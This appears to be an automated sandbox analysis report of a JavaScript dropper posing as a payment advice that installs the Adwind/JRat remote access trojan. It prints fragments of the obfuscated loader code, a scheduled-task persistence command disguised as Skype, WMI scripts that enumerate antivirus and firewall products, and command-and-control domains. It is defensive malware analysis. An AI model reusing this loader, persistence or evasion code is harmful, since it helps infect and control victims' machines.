Source: wscript.exe, 00000000.00000002.8268162216.0000000006930000.00000002.sdmp, wscript.exe, 00000004.00000002.7674173949.0000000005820000.00000002.sdmp, wscript.exe, 00000005.00000002.8748496547.0000000005B00000.00000002.sdmp, javaw.exe, 00000006.00000002.7697698930.0000000015990000.00000002.sdmp, javaw.exe, 0000000B.00000002.8769638913.0000000015A30000.00000002.sdmp, javaw.exe, 0000000F.00000002.7797593750.0000000001070000.00000002.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: javaw.exe, 00000006.00000002.7678289065.0000000002EF0000.00000004.sdmp, javaw.exe, 0000000B.00000002.8757288355.0000000003020000.00000004.sdmp, javaw.exe, 0000000F.00000002.7813408295.0000000014C00000.00000002.sdmpBinary or memory string: ,java/lang/VirtualMachineError
Source: wscript.exe, 00000005.00000002.8750970481.0000000006310000.00000004.sdmp, wscript.exe, 00000017.00000002.8908412172.000001E97BA29000.00000004.sdmpBinary or memory string: Hyper-V RAW
Source: javaw.exe, 0000000F.00000002.7793994403.00000000001C8000.00000004.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: javaw.exe, 00000006.00000002.7678289065.0000000002EF0000.00000004.sdmp, javaw.exe, 0000000B.00000002.8757288355.0000000003020000.00000004.sdmpBinary or memory string: O[Ljava/lang/VirtualMachineError;
Source: wscript.exe, 00000000.00000002.8268162216.0000000006930000.00000002.sdmp, wscript.exe, 00000004.00000002.7674173949.0000000005820000.00000002.sdmp, wscript.exe, 00000005.00000002.8748496547.0000000005B00000.00000002.sdmp, javaw.exe, 00000006.00000002.7697698930.0000000015990000.00000002.sdmp, javaw.exe, 0000000B.00000002.8769638913.0000000015A30000.00000002.sdmp, javaw.exe, 0000000F.00000002.7797593750.0000000001070000.00000002.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000000.00000002.8268162216.0000000006930000.00000002.sdmp, wscript.exe, 00000004.00000002.7674173949.0000000005820000.00000002.sdmp, wscript.exe, 00000005.00000002.8748496547.0000000005B00000.00000002.sdmp, javaw.exe, 00000006.00000002.7697698930.0000000015990000.00000002.sdmp, javaw.exe, 0000000B.00000002.8769638913.0000000015A30000.00000002.sdmp, javaw.exe, 0000000F.00000002.7797593750.0000000001070000.00000002.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000005.00000002.8750970481.0000000006310000.00000004.sdmpBinary or memory string: Hyper-V RAW
Source: javaw.exe, 0000000B.00000002.8755708675.00000000015A0000.00000004.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: wscript.exe, 00000000.00000002.8268162216.0000000006930000.00000002.sdmp, wscript.exe, 00000004.00000002.7674173949.0000000005820000.00000002.sdmp, wscript.exe, 00000005.00000002.8748496547.0000000005B00000.00000002.sdmp, javaw.exe, 00000006.00000002.7697698930.0000000015990000.00000002.sdmp, javaw.exe, 0000000B.00000002.8769638913.0000000015A30000.00000002.sdmp, javaw.exe, 0000000F.00000002.7797593750.0000000001070000.00000002.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Anti Debugging:

barindex
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Windows\SysWOW64\wscript.exeSystem information queried: KernelDebuggerInformationJump to behavior
Creates guard pages, often used to prevent reverse engineering and debuggingShow sources
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeMemory protected: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\System32\wscript.exeNetwork Connect: 41.217.32.205 75
Contains functionality to query the security center for anti-virus and firewall productsShow sources
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: emservicesex.execquery("select * from antivirusproduct");
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: end
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: owmi = getobject("wih
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: ts:{impersonationlevr
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: uritycenter2")
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: set f
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: elect * from antivirj
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: oduct")
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: for each obt
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: m in colitems
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: wit^
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: jitem
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: wscript.ex
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: "{""av"":""" & .dis"
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: name & """}"
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: end ,
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: bemservicesex.execquery("select * from antivirusproduct");
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: :iswbemobjectset._newenum();
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: :iswbemobjectex._01800001();
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: tihost.echo("{"av":"windows defender"}");
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: "}av":"* from antivirusproductmpersonate}!\\.\root\securitycenter2
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: set@<
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: owmi@
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: getobject@
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: bwinmgmts:{impersonationlevel=impersonate}!\\.\root\securitycenter2@
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: colitems@
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: execquery@
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: select * from antivirusproductb
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: each@*
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: objiteml
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: with@
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: wscript@o
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: echo@
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: {"av":"@g
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: displayname@
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: winmgmts:{impersonationlevel=impersonate}!\\.\root\securitycenter2
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: getobject<
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: t.<select * from antivirusproduct
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: execquery
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: colitems*
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: objitem
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: {"av":"g
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: displayname
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: vbscript - script blockset owmi = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\securitycenter2")
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: set colitems = owmi.execquery("select * from antivirusproduct")
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: for each objitem in colitems
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: with objitem
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: wscript.echo "{""av"":""" & .displayname & """}"
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmpBinary or memory string: end with
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: var callerreactjs = new function();
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: function nextedfunctionone(_) {
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: return function (none_value, nuller) {
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: return function (none_value_two) {
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: return function (none_value_three) {
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: return function (none_value_four) {
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: return function(nodejsserverscript , _crackernut) {
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: var _dummyobject =new callerreactjs();
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: nodejsserverscript.type = 1; nodejsserverscript.open();
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: nodejsserverscript.write(_crackernut);
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: nodejsserverscript.position = 0;
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: nodejsserverscript.type = 2;
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: nodejsserverscript.charset = "us-ascii";
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: return nodejsserverscript.readtext();
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: }
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: }
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: }
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: }
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: function v8engine(_crra, snapshopt_v1) {
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: var puengine$ = _crra.createelement("tmp");
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: puengine$.datatype = "bin.base64";
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: puengine$.text = snapshopt_v1;
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: return puengine$.nodetypedvalue;
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: function nextedfunction(__) {
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: return function (none_value) {
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: return function(_crrakk, _crackernut, nodejsserverscript, _nutengine) {
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: return nextedfunctionone([])(null,null)({_:""})(null)( {} instanceof object)(nodejsserverscript, _crackernut);
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: }
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: function nextedfunctiontwo(_) {
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: return function (_crra, snapshopt_v1) {
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: if (_crra != null && typeof [] != 'string' && typeof object != 'string') {
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: return v8engine(_crra, snapshopt_v1);
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: }
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: function workradiostation(godofwar, fdsdsd) {
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: var compat, electric, duvet, codeengine$$;
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: if (typeof fdsdsd != null) {
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: var regx = new regexp(compat, "g");
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: codeengine$$ = duvet.replace(regx, electric);
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: var objectbucket = "devet.endswith('.server.{columnjs}')".charcodeat(0);
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: return nextedfunctiontwo([])(null,null)({_:""})(null)( {} instanceof object)(wscript.createobject("microsoft.xmldom"), codeengine$$);
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: function conferencecentercall(){
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: callerreactjs.constructor.pphx = function(){
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: var uui =
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: workradiostation(
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: 0, !!0, !(0&!!0&!!0&!0|new number(34), uui),
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: !!(new regexp("",'g').exec()),null);
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: var objectmethods= eval(
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: nextedfunction(
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: wscript.disconnectobject(
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: wscript.createobject("adodb.stream")
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: )
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: )
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: (null)(null)(null)(null)
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: (!!0, uui,wscript.createobject("adodb.stream"), number([24 / 12].tostring()
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: ));
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: };
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: this.me_instance = callerreactjs.constructor.pphx();
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: var install_instance = new conferencecentercall();
Source: 35Payment Advise - 201903140987758292 copy_2.jsBinary or memory string: var ff= install_instance.me_instance ;
Source: cce3fe3b0d8d80db.timestamp.11.drBinary or memory string: c:\program files (x86)\java\jre1.8.0_171
Source: cce3fe3b0d8d80db.timestamp.11.drBinary or memory string: 1552648042024
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\jQhqDpyueS.js' Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\ufvkaboule.txt'Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\IyFfaseYOW.js' Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\rnmbjgzzvs.txt'Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\IyFfaseYOW.jsJump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)MJump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw' -jar 'C:\Users\user\AppData\RoamingServer1333639532.jar'Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw' -jar 'C:\Users\user\AppData\RoamingServer757169862.jar'Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\IyFfaseYOW.js
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw' -jar 'C:\Users\user\AppData\RoamingServer1540907542.jar'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\IyFfaseYOW.js
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_171\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_171\bin\java.exe' -jar C:\Users\CRAIGH~1\AppData\Local\Temp\_0.77942883373632286473112401160232438.class
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\CRAIGH~1\AppData\Local\Temp\Retrive1973602545167020741.vbs
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\CRAIGH~1\AppData\Local\Temp\Retrive7989435855425943881.vbs
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\CRAIGH~1\AppData\Local\Temp\Retrive6603369485550255976.vbs
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\java.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\java.exeProcess created: unknown unknown
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\IyFfaseYOW.js
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\CRAIGH~1\AppData\Local\Temp\Retrive1973602545167020741.vbs
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\CRAIGH~1\AppData\Local\Temp\Retrive6603369485550255976.vbs
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: wscript.exe, 00000005.00000002.8741816039.0000000003930000.00000002.sdmp, javaw.exe, 0000000B.00000002.8756517606.0000000001A30000.00000002.sdmpBinary or memory string: Shell_TrayWnd
Source: wscript.exe, 00000005.00000002.8741816039.0000000003930000.00000002.sdmp, javaw.exe, 0000000B.00000002.8756517606.0000000001A30000.00000002.sdmpBinary or memory string: Progman
Source: wscript.exe, 00000005.00000002.8741816039.0000000003930000.00000002.sdmp, javaw.exe, 0000000B.00000002.8756517606.0000000001A30000.00000002.sdmpBinary or memory string: ZProgram Manager

Language, Device and Operating System Detection:

barindex
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
AV process strings found (often used to terminate AV products)Show sources
Source: wscript.exe, 00000005.00000002.8750970481.0000000006310000.00000004.sdmp, wscript.exe, 00000017.00000002.8908412172.000001E97BA29000.00000004.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)Show sources
Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\SysWOW64\cscript.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct
Source: C:\Windows\SysWOW64\cscript.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct

Remote Access Functionality:

barindex
ADWIND Rat detectedShow sources
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeDropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")For Each objItem in colItems With objItem WScript.Echo "{""AV"":""" & .displayName & """}" End WithNextJump to dropped file
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeDropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")For Each objItem in colItems With objItem WScript.Echo "{""FIREWALL"":""" & .displayName & """}" End WithNextJump to dropped file
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\java.exeDropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")For Each objItem in colItems With objItem WScript.Echo "{""AV"":""" & .displayName & """}" End WithNextJump to dropped file
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\java.exeDropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")For Each objItem in colItems With objItem WScript.Echo "{""FIREWALL"":""" & .displayName & """}" End WithNextJump to dropped file
Java source code contains strings found in CrossRATShow sources
Source: ufvkaboule.txt.0.drSuspicious string: operational.JRat (in operational/Jrat.java)
Source: rnmbjgzzvs.txt.4.drSuspicious string: operational.JRat (in operational/Jrat.java)

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 116875 Sample: 35Payment Advise - 201903140987758292 copy_2.js Startdate: 15/03/2019 Architecture: WINDOWS Score: 100 96 sweetboy.duckdns.org 2->96 98 unknownsoft.hopto.org 2->98 118 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->118 120 Multi AV Scanner detection for domain / URL 2->120 122 Antivirus detection for URL or domain 2->122 124 7 other signatures 2->124 10 wscript.exe 1 3 2->10         started        13 wscript.exe 2->13         started        17 wscript.exe 2->17         started        19 5 other processes 2->19 signatures3 process4 dnsIp5 134 Drops script or batch files to the startup folder 10->134 21 javaw.exe 10->21         started        24 wscript.exe 1 3 10->24         started        102 unknownsoft.hopto.org 13->102 92 C:\Users\user\AppData\...\IyFfaseYOW.js, ASCII 13->92 dropped 27 schtasks.exe 13->27         started        104 unknownsoft.hopto.org 17->104 94 C:\Users\user\AppData\Roaming\IyFfaseYOW.js, ASCII 17->94 dropped 136 System process connects to network (likely due to code injection or exploit) 17->136 29 schtasks.exe 17->29         started        106 unknownsoft.hopto.org 19->106 108 unknownsoft.hopto.org 19->108 110 unknownsoft.hopto.org 19->110 138 Creates multiple autostart registry keys 19->138 31 javaw.exe 19->31         started        34 javaw.exe 19->34         started        36 schtasks.exe 19->36         started        file6 signatures7 process8 dnsIp9 82 C:\Users\...\Retrive7989435855425943881.vbs, ASCII 21->82 dropped 84 C:\Users\...\Retrive1973602545167020741.vbs, ASCII 21->84 dropped 38 java.exe 21->38         started        42 cmd.exe 21->42         started        44 cmd.exe 